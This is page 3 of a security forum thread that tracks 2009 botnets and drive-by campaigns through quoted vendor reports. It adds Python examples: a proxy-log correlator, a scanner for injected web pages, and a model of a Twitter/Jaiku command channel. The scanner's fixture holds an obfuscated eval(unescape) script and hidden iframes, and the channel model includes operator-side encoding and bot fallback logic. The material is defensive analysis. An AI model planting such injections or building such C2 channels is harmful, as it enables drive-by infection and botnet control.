News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
Pages: 1 2 [3] 4 5
Topic: Pandemic of the botnets 2009  (Read 28220 times)
« Reply #30 on: May 13, 2009, 11:34:37 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 8366



FYI...

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-the-art-of-spamming/
May 12, 2009 - "... One of the biggest spamming botnets out there is Pushdo. This botnet has managed to stay under the radar since 2007 even though it has been reported to be responsible for a huge percentage of the spam worldwide. It has even managed to make it consistently to the Top 5 largest botnets without ever reaching number one. There are reports of 7.7 billion spammed emails per day coming from this botnet, which puts it in the Top 2 largest spamming botnets worldwide... One of the latest batches contains an executable which displayed popup ads to the user, most probably from an advertiser who paid good money for the mass-deployment of their software. The only component that is always present is the spamming engine, which some antivirus vendors have dubbed as Cutwail..."

- http://blog.trendmicro.com/pushdocutwail-%E2%80%93-from-russia-with-love-part-2-of-5/
May 13, 2009 - "... The famous Storm botnet from 2008 had strong links to the so-called Russian Business Network operating out of St. Petersburg, and from our research it appears that Pushdo is linked to the Moscow area. Like other spam botnets Pushdo’s spamming component, known as Cutwail, sends spam in waves, each advertising a particular service. Normally these consist of porn, pharmacy spam etc – but it was when we started to see ads for Salsa classes and Construction services that we became really interested... As part of our research we contacted the gang on one of the numbers they provided, posing as a potential customer of their spamming services. As customer service satisfaction goes these guys were very helpful, providing us with bank account details that we could pay them through, and even offering to pick up the money in person if we were based in Moscow. On top of that they would throw in a free website design to promote our business, and offered to craft their “advertising mail services” (that’s unsolicited spam to you and me) to best avoid anti-spam signatures..."

(Screenshots available at both URLs above.)


This machine has no brain.
....... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
« Reply #31 on: May 15, 2009, 03:45:09 »
AplusWebMaster
FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html

- http://www.theregister.co.uk/2009/05/14/viral_web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.com/blogs/sophoslabs/v/post/4422
May 14, 2009

http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

« Last Edit: May 17, 2009, 02:37:11 by AplusWebMaster »
« Reply #32 on: May 19, 2009, 01:12:46 »
AplusWebMaster
FYI...

- http://www.secureworks.com/research/blog/index.php/2009/05/12/following-the-trojan-trail/
May 12, 2009 - "... The "Finjan botnet" appears to be large... credit to FireEye for trying to track down the Finjan Botnet that Finjan first reported on. Reading through the Finjan and FireEye write-ups, one is able to reconstruct the trail and also discover the path taken. We can see two major types of Trojans that play a part in this. We have the VBInject Trojan and the AutoIt Trojan... There are two servers on the same network to which -VBInject- phones home: x.x.62.2 and x.x.21.186. The server at x.x.21.186 is no longer responsive and appears down at this time. The server at x.x.62.2 is still up and DNS still responds with that IP address for the domain name used in these attacks. If you actually try to browse to that domain though, you will not arrive at this server. As you can see from reading the FireEye article, the Trojan phones home to /ldr/loadlist.php. It downloads more malware from /ldr/dl/. One of the Trojans it downloads is -AutoIt-... This is the AutoIt Trojan phoning home and the response is to download around 15 pieces of malware...
As you can see by following the trail, gone are the days where you have just one Trojan infection. When you become infected today, it is best to just do a complete reformat of your machine instead of trying to recover it, because you really don’t know how many infections you have. I have read plenty of articles where someone cleans their machine and they think everything is fine only to find more malware days to weeks later.
There is not any perfect AV tool; there is no perfect solution for any one problem. Your best defense is to practice what is called defense in depth and to only go to known websites. Don’t open mail from people you don’t know and be careful opening attachments from people that you do know. Update your OS and software regularly, including AV. Just having AV does not mean that you are protected; you also have to keep it updated."
• FireEye Blog - http://blog.fireeye.com/research/2009/04/botnetweb-part-ii.html
• Finjan article - http://www.finjan.com/MCRCblog.aspx?EntryId=2237
• Prevx shows ZCHMIB.EXE - http://www.prevx.com/filenames/1521641268775071064-X1/ZCHMIB.EXE.html
• ThreatExpert shows TDSS/Seneka activity - http://www.threatexpert.com/report.aspx?md5=5a1a6f4e83900e86c3e7dc62554318ac

(More detail and screenshots available at the Secureworks URL above.)

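Added example (my own, not SecureWorks' or FireEye's tooling, and not part of the quoted post): the write-up above gives two check-in URIs, /ldr/loadlist.php and /ldr/dl/, and the sequence matters more than either string alone. The script below correlates a proxy log for that two-stage pattern per client: a check-in followed by payload downloads inside a window. The Squid native log format, the 10-minute window, the .invalid hostnames and the sample lines are all assumptions/constructed data.

```python
"""Correlate proxy logs for the two-stage loader pattern described in the
SecureWorks post: a client fetches /ldr/loadlist.php (the VBInject check-in)
and then pulls one or more binaries from /ldr/dl/.  This is an added example,
not SecureWorks' or FireEye's tooling.  Assumptions: Squid native access.log
format, a 10-minute correlation window, and the constructed sample lines
below (hosts and addresses are documentation ranges, not real infrastructure).
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Squid native format: "<epoch> <elapsed_ms> <client> <code/status> <bytes> <method> <url> ..."
SQUID_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+\d+\s+(?P<client>\S+)\s+(?P<result>\S+)\s+\d+\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

CHECKIN_PATH = "/ldr/loadlist.php"   # check-in URI quoted in the SecureWorks write-up
PAYLOAD_DIR = "/ldr/dl/"             # download directory quoted in the write-up
WINDOW_SECONDS = 10 * 60             # assumption: downloads follow the check-in within minutes

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
1242086400.101    212 10.0.0.5 TCP_MISS/200 1840 GET http://example-c2.invalid/ldr/loadlist.php - DIRECT/198.51.100.7 text/html
1242086431.550   3320 10.0.0.5 TCP_MISS/200 209412 GET http://example-c2.invalid/ldr/dl/1.exe - DIRECT/198.51.100.7 application/octet-stream
1242086433.020   2900 10.0.0.5 TCP_MISS/200 187004 GET http://example-c2.invalid/ldr/dl/2.exe - DIRECT/198.51.100.7 application/octet-stream
1242086500.000    150 10.0.0.9 TCP_MISS/200 5120 GET http://www.example.com/ldr/dl/readme.txt - DIRECT/203.0.113.1 text/plain
1242086610.000    140 10.0.0.12 TCP_MISS/404 320 GET http://example-c2.invalid/ldr/loadlist.php - DIRECT/198.51.100.7 text/html
"""


def parse_events(log_text):
    """Yield (timestamp, client, url_path, url) for every line that parses."""
    for line in log_text.splitlines():
        m = SQUID_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        yield float(m.group("ts")), m.group("client"), urlsplit(url).path, url


def suspicious_clients(log_text):
    """Low-confidence view: every client that touched either loader URI at all."""
    return {client for _, client, path, _ in parse_events(log_text)
            if path == CHECKIN_PATH or path.startswith(PAYLOAD_DIR)}


def loader_chains(log_text, window=WINDOW_SECONDS):
    """High-confidence view: a check-in followed by payload downloads from the
    same client inside the window.  Returns one record per check-in that had
    at least one follow-on download."""
    by_client = defaultdict(list)
    for ts, client, path, url in parse_events(log_text):
        by_client[client].append((ts, path, url))

    chains = []
    for client, events in by_client.items():
        events.sort()
        for i, (ts, path, _) in enumerate(events):
            if path != CHECKIN_PATH:
                continue
            downloads = [u for t, p, u in events[i + 1:]
                         if p.startswith(PAYLOAD_DIR) and t - ts <= window]
            if downloads:
                chains.append({"client": client, "checkin": ts, "downloads": downloads})
    return chains


if __name__ == "__main__":
    for chain in loader_chains(SAMPLE_LOG):
        print(f"{chain['client']}: check-in at {chain['checkin']:.0f}, "
              f"{len(chain['downloads'])} payload(s) -> {chain['downloads']}")
    print("clients touching loader URIs:", sorted(suspicious_clients(SAMPLE_LOG)))
```

On the sample, only 10.0.0.5 produces a chain; 10.0.0.9 (a download-path hit on an unrelated host) and 10.0.0.12 (a check-in that got a 404 and nothing after it) only appear in the low-confidence set, which is the list you would eyeball rather than act on.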
« Reply #33 on: May 19, 2009, 01:33:27 »
AplusWebMaster
More...

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web
May 14, 2009

« Reply #34 on: May 19, 2009, 08:43:33 »
AplusWebMaster
FYI...

- http://preview.tinyurl.com/qlr9ba
05-19-2009 Symantec Security Response Blog - "The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains. The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.
So how is it that so many websites are compromised at one time? Often it is due to SQL injection errors or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords that belonged to the people that administer the websites. In any case, it means the bad guys are able to continually change the malicious code until the admin changes the FTP passwords and blocks the trespassing... We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up..."

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-19 13:02:01 UTC - "... the dropbox for this trojan, gumblar .cn has been offline since last friday, but a successor has come online, martuz .cn..."

- http://blog.scansafe.com/journal/2009/5/19/gumblar-up-another-7-martuzcn-is-down.html
May 19, 2009
- http://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html
- http://blog.scansafe.com/journal/2009/5/18/gumblar-a-botnet-of-compromised-websites.html

- http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating
May 18, 2009

« Last Edit: May 20, 2009, 02:38:17 by AplusWebMaster »
« Reply #35 on: May 21, 2009, 02:55:04 »
AplusWebMaster
FYI...

Conficker continues to spread
- http://viewfromthebunker.com/2009/05/20/conficker-continues-to-spread/
May 20, 2009 - "... the Symantec threat intelligence team estimates there are 50,000 newly infected PCs a day right now... the US, Brazil and India top the charts."

(Chart available at the URL above.)

- http://isc.sans.org/diary.html?storyid=5860

« Reply #36 on: May 22, 2009, 08:28:12 »
AplusWebMaster
FYI...

- http://isc.sans.org/diary.html?storyid=6430
Last Updated: 2009-05-21 19:29:48 UTC - "... client side analysis* and writeup of recent gumblar malware attacks..."
* http://preview.tinyurl.com/pc26gr
May 21, 2009 InfoSec from the trenches - "... Once compromised by the Gumblar/Martuz/Geno attack, victims will have many pieces of malware loaded onto their machines; this malware does the following:
• Steals FTP credentials
• Sends SPAM
• Installs fake antivirus
• Hijacks Google search queries
• Disables security software
The exploits used are for Adobe Acrobat and Adobe Flash Player...
...this is a very large attack encompassing many malicious payloads..."

« Last Edit: May 22, 2009, 08:50:42 by AplusWebMaster »
« Reply #37 on: May 29, 2009, 03:38:38 »
AplusWebMaster
FYI...

- http://www.marshal8e6.com/trace/i/Template-Based-Spam,trace.996~.asp
May 28, 2009 - "... Most of today's top spamming botnets, such as Rustock, Pushdo, MegaD, Xarvester and Grum use template based spam bots. This allows the spammers to offload all of the email generation and bandwidth onto the bots. Often a bot will upload the results of each spam run when it has run out of recipient addresses to the control server before downloading a new template. This gives the spammers an idea of how many spam messages their botnet is sending and if the messages were successfully sent to the recipient or blacklisted."

« Reply #38 on: June 17, 2009, 08:33:49 »
AplusWebMaster
FYI...

Golden Cash botnet
- http://www.finjan.com/MCRCblog.aspx?EntryId=2281
June 17, 2009 - "... A user visits a legitimate compromised website which contains a malicious Iframe. This Iframe causes the victim’s browser to pull the exploit code from a server armed with the exploit toolkit. Upon successful exploitation, a special build of a Trojan, created for the attacker, is pulled from the Golden Cash server. Once installed, the Trojan reports back to the Golden Cash server and the attacker’s account at Golden Cash is credited with currency. The first instruction sent by Golden Cash to the victim’s machine is to install an FTP-grabber (to steal FTP-credentials). Our research found about 100,000 stolen FTP-credentials on the Golden Cash server. The victim’s machine is now in a pool of infected machines controlled by Golden Cash and being auctioned to other criminals, using a different website for buyers. From time to time, the victim’s machine gets instructions to install malware on behalf of the criminal-customer. The Trojan on the victim machine reports back to Golden Cash on each successful installation of the customer’s malware and the criminal-customer account is charged with currency. The victim machine is back in the ‘available for more infections’ pool... the botnet spreads using distributors. For each distributor, a special bot build is created. The special build assists the cybercriminal to track the installations of each distributor... Some of the stolen FTP-credentials were used to inject a malicious Iframe into the webpages that were stored on the FTP server. The reason for this was to infect more machines and generate organic growth. The C&C server is hosted in Texas, US; the registrant country is China. The “proxy” website that tunnels traffic to the C&C server is hosted in Krasnodar, Russia."

(Screenshots available at the URL above.)

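Added example (mine, not code from Trend Micro, Symantec, ScanSafe, Finjan or any other vendor quoted in this thread): both the Gumblar/Martuz reports (Reply #31 and #34, obfuscated JavaScript deep in page source, the domain assembled from variables instead of spelled out, delivered through stolen FTP passwords) and the Golden Cash post above (hidden Iframes injected into pages on the FTP server) come down to the same question for a site owner: what did the attacker add to my files? The scanner below walks a web root and flags hidden iframes and scripts that show two or more obfuscation indicators, then peels one layer of %XX encoding to see what an injected script would write. The regexes are heuristics I chose (assumptions), the two sample pages are constructed, and the .invalid hostnames are placeholders.

```python
"""Scan web content for the two injection patterns reported in this thread:
the obfuscated <script> blocks of Gumblar/Martuz (eval/unescape, long %XX
escape runs, and a hostname assembled from variables and string fragments,
as Symantec describes) and the hidden <iframe> that Golden Cash planted via
stolen FTP credentials.  Added example, not code from any of the quoted
vendors.  The regexes are heuristics (assumptions), and the two pages below
are constructed samples, not real injected content.
"""
import os
import re
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# an iframe nobody is meant to see: zero size or hidden via inline style
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)
# calls that turn an opaque string into executed code or markup
OBFUSCATION_RE = re.compile(r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)
# a run of 20+ consecutive %XX or \xXX escapes
LONG_ESCAPE_RE = re.compile(r"(?:%[0-9a-f]{2}){20,}|(?:\\x[0-9a-f]{2}){20,}", re.I)
# a hostname/URL glued together from variables and short string fragments
SPLIT_HOST_RE = re.compile(
    r"""(?:(?:"[^"]{1,12}"|'[^']{1,12}'|[A-Za-z_]\w{0,8})\s*\+\s*){2,}(?:"[^"]{1,12}"|'[^']{1,12}')""")


def hidden_iframes(text):
    return [m.group(0) for m in IFRAME_RE.finditer(text) if HIDDEN_RE.search(m.group(0))]


def scan_html(html):
    """Return a list of (kind, detail) findings for one page."""
    findings = [("hidden-iframe", tag) for tag in hidden_iframes(html)]
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        reasons = [name for name, rx in (("eval-or-unescape", OBFUSCATION_RE),
                                         ("long-escape-run", LONG_ESCAPE_RE),
                                         ("split-string-host", SPLIT_HOST_RE))
                   if rx.search(body)]
        if len(reasons) >= 2:          # one indicator alone is too noisy on real sites
            findings.append(("obfuscated-script", ",".join(reasons)))
        decoded = unquote(body)        # peel one layer of %XX encoding
        if decoded != body:
            findings += [("hidden-iframe-decoded", tag) for tag in hidden_iframes(decoded)]
    return findings


def scan_tree(root, exts=(".html", ".htm", ".php", ".js")):
    """Walk a web root and report findings per file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples (not real injected pages).
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<script>function toggle(id){var e=document.getElementById(id);
e.style.display=(e.style.display=="none")?"block":"none";}</script>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://example-pool.invalid/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script>var a="gum",b="blar",c=".cn";var s="http://"+a+b+c+"/rss/?id=1";
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%27%2B%73%2B%27%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%27%29"))</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, scan_html(page))
```

Run scan_tree("/var/www") (or wherever the FTP account lands) from a clean admin box, not from the possibly infected workstation, and treat a hit as a reason to rotate the FTP password before cleaning the file; as the Symantec piece says, the code just comes back otherwise. The clean sample yields nothing, the injected one yields the literal hidden iframe, the script with all three indicators, and the hidden iframe the decoded script would have written.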
« Reply #39 on: July 08, 2009, 04:30:36 »
AplusWebMaster
FYI...

- http://www.eset.com/threat-center/blog/?p=1285
July 7, 2009 - "... After 4th July, we have noticed an increase in the number of emails in circulation, and this week will be even more active. We believe that, like other campaigns, this one will last at least 15 days. However, what many readers may be wondering is why Waledac was “asleep” so many months. The reality is that the Trojan wasn’t spreading at that point. However, the botnet that was built with Waledac remained as active as ever, working mainly to achieve its most important goal: to send spam. At ESET Latin America’s Laboratory, we made some tests to enable us to share information with users that shows the importance of staying uninfected: if my computer is infected with Waledac, how much spam does it send? We infected a computer in the laboratory with one of the Waledac trojans...
After that, we used a tool to monitor network traffic to see how many emails were sent by the botnet since the system became infected. We made an initial measurement in 4 stages over a period of one hour (at different times of day), and the results were as follows:
• Stage 1: between 18:00 and 19:00, 6968 emails were sent
• Stage 2: between 20:30 and 21:30, 7148 emails were sent
• Stage 3: between 10:00 and 11:00, 5610 emails were sent
• Stage 4: between 13:00 and 14:00, 6568 emails were sent
Taking the average of emails sent per hour (6548 emails), it is estimated that an infected computer can send about 150,000 emails a day. To be even clearer, that represents nearly two emails per second... If we consider that the network is estimated to consist of at least 20,000 infected computers, it can be seen that the botnet has a theoretical spam-sending capacity of 3 billion emails daily... many users will now understand why their computers work so slowly when their systems are infected..."

« Last Edit: July 08, 2009, 17:40:23 by AplusWebMaster »
« Reply #40 on: July 16, 2009, 16:14:34 »
AplusWebMaster
FYI...

Malware authors exploiting Conficker
- http://www.techworld.com/security/news/index.cfm?newsID=119223
15 July 2009 - "Creators of Waledac malware have used the Conficker botnet as a tool to spread malware of their own, marking the first time Conficker was made available for hire, according to Cisco. Writing in its mid-yearly security report*, Cisco said that this was symptomatic of a wider trend of malware purveyors using established business practices to expand their illegal enterprises. Cisco likened the arrangement between Waledac and Conficker to a partner ecosystem, a term Cisco uses to describe its collaboration with other vendors. Waledac used the Conficker distribution channel to send spam and to expand its own botnet... Web sites that are infected to download malware to unsuspecting visitors will increase, the report predicted. These sites represent nearly 90 percent of all web-based threats, the report says. Creation of botnets would be a particular goal of this type of malware..."
* http://www.cisco.com/en/US/prod/vpndevc/annual_security_report.html

« Reply #41 on: July 24, 2009, 03:40:29 »
AplusWebMaster
FYI...

Botnet money...
- http://www.viruslist.com/en/analysis?pubid=204792068
July 22, 2009 - "In the past ten years, botnets have evolved from small networks of a dozen PCs controlled from a single C&C (command and control center) into sophisticated distributed systems comprising millions of computers with decentralized control. Why are these enormous zombie networks created? The answer can be given in a single word: money. A botnet, or zombie network, is a network of computers infected with a malicious program that allows cybercriminals to control the infected machines remotely without the users’ knowledge. Zombie networks have become a source of income for entire groups of cybercriminals. The invariably low cost of maintaining a botnet and the ever diminishing degree of knowledge required to manage one are conducive to growth in popularity and, consequently, the number of botnets... Botnet owners or developers who have been prosecuted can be counted on the fingers of two hands. Which is not the case with botnets that are live on the Internet: the number of these has exceeded 3600... Without help from users, combating botnets cannot be effective. It is home computers that make up the lion’s share of the enormous army of bots. Neglecting to stick to simple security rules, such as using antivirus software, using strong account passwords and disabling the AutoPlay feature for removable media, can result in your computer becoming another botnet member, providing cybercriminals with your data and resources..."

« Reply #42 on: August 14, 2009, 14:14:16 »
AplusWebMaster
FYI...

Twitter-based botnet command channel
UPDATED TO ADD STATS AND JAIKU PROFILE AND A TUMBLR PROFILE
- http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/
August 13, 2009 - "While digging around I found a botnet that uses Twitter as its command and control structure. Basically what it does is use the status messages to send out new links to contact, then these contain new commands or executables to download and run. It’s an infostealer operation. The account in question is under analysis by Twitter’s security team. I spotted it because a bot uses the RSS feed to get the status updates. As for the original bot in question that fetches the updates, here’s the VirusTotal analysis*, where you can see it’s detected by 19/41 (46.34%) AV tools under evaluation. We can look at the status messages and discover more nefarious activity; the bot’s hiding new malcode which is poorly detected this way. The original link from the malcode came from a ShadowServer nightly link report, which they make available to folks. Many thanks to them...
UPDATE 14 Aug 2009 - Via bit.ly, some statistics that suggest the malcode has infected a couple hundred PCs, mostly in Brazil..."

(More detail at the URL above.)

* http://www.virustotal.com/analisis/6a6c334ffe5c8e60b1de37582b73a642c68d2b02b0284000d24c93f899122139-1249801350
File 40d09b7d94da70ede50866c55f48613c-2358.txt received on 2009.08.09 07:02:30 (UTC)
Result: 19/41 (46.34%)

* http://www.virustotal.com/analisis/14fd37ef063f3c13d667e7483803a17ec493395a0d0e0365da4bed60272f311e-1250187288
File gbpm.exe received on 2009.08.13 18:14:48 (UTC)
Result: 9/41 (21.95%)

- http://www.symantec.com/connect/blogs/twittering-botnets
August 14, 2009

Infostealer.Bancos heatmap
- http://www.symantec.com/connect/imagebrowser/view/image/974211/_original

- http://www.symantec.com/connect/blogs/downloader-micro-blogging-and-prophecy
August 16, 2009 - "... A new variant of this threat has emerged that uses not only Twitter but also another social networking and micro-blogging site Jaiku.com. Symantec detects this Trojan as Downloader.Sninfs.B*. Like the previous variant, Downloader.Sninfs.B also attempts to get URLs from obfuscated Twitter status messages. However, if that attempt fails, the Trojan will use the RSS feed from an account registered on Jaiku .com to obtain the location of remote files..."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-081603-5537-99&tabid=2
Discovered: August 16, 2009 = "... may be saved as the following files:
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.exe
%Temp%\[SET OF RANDOM NUMBERS]\gbpm.dll
%Temp%\[SET OF RANDOM NUMBERS]\update.exe (copy of gbpm.exe) ..."

« Last Edit: August 17, 2009, 01:51:51 by AplusWebMaster »
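Added example (mine, not the malware's code and not from the Arbor or Symantec posts): the channel described above is simple enough to model end to end. The bot polls an account's RSS feed, treats each status as an obfuscated pointer to the next stage, and (per the Downloader.Sninfs.B write-up) falls back to a second feed on Jaiku when the first yields nothing. The script below has the operator side (encode a URL into a status), the bot side (parse the feed, decode, validate, fall back) and a simulated account suspension. Base64 as the obfuscation is my assumption (the posts say "obfuscated" without giving the scheme), the feeds are constructed, and the .invalid hostnames are placeholders.

```python
"""Model of the social-media command channel described in the Arbor and
Symantec posts: the bot pulls an account's RSS feed, treats each status as an
obfuscated pointer to the next stage, and falls back to a second feed (Jaiku
in Symantec's Downloader.Sninfs.B write-up) when the first yields nothing.
Added example, not the malware's code.  Assumptions: base64 as the
obfuscation (the real encoding is not described in the posts), RSS 2.0 item
titles as the status text, and the constructed feeds and .invalid hostnames
below.
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit


def encode_status(url):
    """Operator side: turn a stage URL into a status message."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def make_feed(titles):
    """Build a minimal RSS 2.0 document whose item titles are the statuses."""
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    ET.SubElement(channel, "title").text = "statuses"
    for title in titles:
        ET.SubElement(ET.SubElement(channel, "item"), "title").text = title
    return ET.tostring(rss, encoding="unicode")


def statuses_from_rss(xml_text):
    """Bot side: item titles from a feed; an unparsable or empty feed gives []."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []
    return [item.findtext("title") or "" for item in root.iter("item")]


def decode_status(text):
    """A status counts as a command only if it base64-decodes to an http(s) URL."""
    try:
        raw = base64.b64decode(text.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    parts = urlsplit(raw)
    return raw if parts.scheme in ("http", "https") and parts.netloc else None


def resolve_c2_urls(feeds):
    """Try each feed in order; return (urls, index of the feed that answered)."""
    for index, xml_text in enumerate(feeds):
        urls = [u for u in (decode_status(t) for t in statuses_from_rss(xml_text)) if u]
        if urls:
            return urls, index
    return [], None


# Constructed feeds (no real accounts or hosts).
PRIMARY_URL = "http://example-drop.invalid/upd/gbpm.exe"
FALLBACK_URL = "http://example-drop2.invalid/upd/update.exe"
TWITTER_FEED = make_feed([encode_status(PRIMARY_URL), "bm90IGEgdXJs", "just a normal tweet"])
JAIKU_FEED = make_feed([encode_status(FALLBACK_URL)])
SUSPENDED_FEED = "<html><body><p>Sorry, this account is suspended</body></html>"

if __name__ == "__main__":
    print(resolve_c2_urls([TWITTER_FEED, JAIKU_FEED]))     # primary feed answers
    print(resolve_c2_urls([SUSPENDED_FEED, JAIKU_FEED]))   # account gone: fallback answers
```

Two things worth noticing for the defender: a status that decodes cleanly but is not a URL ("bm90IGEgdXJs" is "not a url") and a normal tweet are both ignored, so the account can carry cover traffic; and because suspending the first account only moves the bot to the next feed in its list, takedown has to cover every account the sample knows about, which is why the Symantec note about the Jaiku fallback matters.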
« Reply #43 on: August 24, 2009, 08:41:07 »
AplusWebMaster
FYI...

Ilomo botnet - All your info are belong to us
- http://blog.trendmicro.com/all-your-info-are-belong-to-us/
August 24, 2009 - "... Ilomo has been active for several years now, and like Pushdo has done so without attracting too much unwanted attention from the security industry. Like Pushdo, the Ilomo threat is quite modular in nature which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries. Ilomo has two key components to its business plan. The first is good old fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session – transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine – ftp, web servers, local administrators etc. These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware... Ilomo’s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals’ identity this proxy network is very useful for defeating another defense built into many banking sites – namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection..."

(Screenshot available at the URL above.)

« Reply #44 on: September 12, 2009, 04:24:59 »
AplusWebMaster
FYI...

Botweb using compromised Linux servers
- http://blog.stopbadware.org/2009/09/11/botweb-using-compromised-linux-servers
9.11.2009 - "Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb ... that he’s been investigating:
'What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with a common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computers (the malware they serve infects computers and turns them into zombies).'
The blog post* contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers..."
* http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

 